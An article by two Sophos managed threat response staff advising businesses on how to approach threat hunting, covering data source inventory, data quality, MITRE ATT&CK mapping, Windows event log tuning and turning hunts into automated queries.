Threat hunting is the acknowledgement that no system can be considered 100% secure. Matt Gangwer, Senior Director, Managed Threat Response, Sophos, and Greg Iddon, Senior Product Marketing Manager, Managed Threat Response, Sophos, offer their advice on how to approach threat hunting for your business.
Whether it is written down or not, every business has the goal of protecting data or information – the lifeblood of modern business – to reduce risk and facilitate the establishment of trust. Trust is the foundation of success for organisations in both the physical and the digital world. A transacting customer affords trust to a business after risk, or at least perceived risk, is reduced to an acceptable level.
Failure to reduce risk forces customers to look elsewhere. A 2018 study from the National Cyber Security Alliance revealed that 25% of SMBs filed for bankruptcy after a data breach, and 10% went out of business entirely. The importance of effective cybersecurity and its ability to reduce risk and maintain customer trust couldn’t be clearer. Effective cybersecurity is not just about implementing security software and policies, it’s about being able to spot and respond to subtle anomalies and behaviours that could indicate an intruder in the network. This is ‘threat hunting’.
Threat hunting is an emergent, human-led endeavour, using an iterative and methodical process to proactively identify threats within a network that have evaded security controls. To threat hunt is to acknowledge that no system can be considered 100% secure, that technology is imperfect and that capable and determined adversaries will find a way to evade multiple layers of protection. The most determined adversaries will test their tactics and techniques against security tooling to ensure they evade detection.
Prevention technologies that proactively protect against threats markedly reduce risk. However, the residual risk, the threats that can evade prevention, are often the most damaging. It is exactly these threats that we must hunt for, analyse and respond to. If we don’t, we risk incidents escalating into fully fledged data breaches and ultimately put the future of our organisations at jeopardy.
While many organisations have already invested in prevention capabilities, many have yet to put major investment into effective detection of latent or missed threats and the ability to respond to them. Threat hunting is an activity that the modern threat landscape necessitates and which must be performed either by an organisation for itself, or outsourced to a capable third-party to perform as a service to the organisation.
For those that are considering threat hunting for themselves, we would like to share a few things that are worth considering before you start:
Data intelligence / data quality
For threat hunting to be successful, one of the first things any team or organisation should do is take inventory of their data sources and what is available to use for threat hunting. This simple exercise will help drive the types of threat hunting that can be performed. For instance, if you don’t have high fidelity network telemetry, then that may be an area to exclude from your hunting scope. Knowing what sources are available allows for several key points right out of the gate:
- Time won’t be wasted performing a hunt over a data set that doesn’t exist — An analyst’s time is extremely valuable, so optimising time when hunt activities are performed will lead to a more efficient and successful team.
- You can begin measuring the success of your data — Every new hunt should bring learnings to the team and organisation. This doesn’t mean finding a new APT group each and every time, but you can begin measuring the success and quality of the data sets to determine what is and what isn’t leading to improvements.
- Advocate for getting new data embedded into the process — As the organisational threat model changes, gaps in coverage can quickly be identified. This will allow for a case to be made to collect and leverage new data sources to accomplish the hunting goals.
Organisations new to threat hunting often overextend the area of data source identification. This is especially the case for those that take the SIEM approach to data collection and aggregation. It is not the volume of data that matters, but one’s ability to identify threats within that data. It is far better to take a threat-centric approach to data collection, whereby a type of threat or vector is considered and then data that aids the detection of that threat is identified for collection. Frameworks like MITRE’s ATT&CK are invaluable tools to help map threat hunting capabilities and to reveal blind spots.
Another common failure made during data collection is to not make full use of the potential of a data source. To give an example, Microsoft Windows event logs are an incredibly powerful source of data for threat hunters, but the default security audit policy leaves many events not logging with enough detail to aid hunters and requires manual reconfiguration to tune up event details. Care and consideration must be given to each data source to avoid simple but common pitfalls such as this.
Use of hunting data
Hunting by design is there to identify potential threats that circumvent conventional monitoring controls. This requires formalised procedures and workflow to ensure that as new hunting hypotheses are generated, they can easily flow through the ‘system’ and go through the necessary testing, analysis and refinement.
The end goal of any hunting team should be to automate and enhance current procedures. To be more specific, as the hunting team completes hunts and those hunts are turning up malicious or anomalous activity that is worthy of investigation, those methods should be taken and turned into automated searches or queries that can be run by the monitoring team. This threshold of promotion will vary between organisations and teams but is an important step to keep the hunt team looking forward at new possible threats.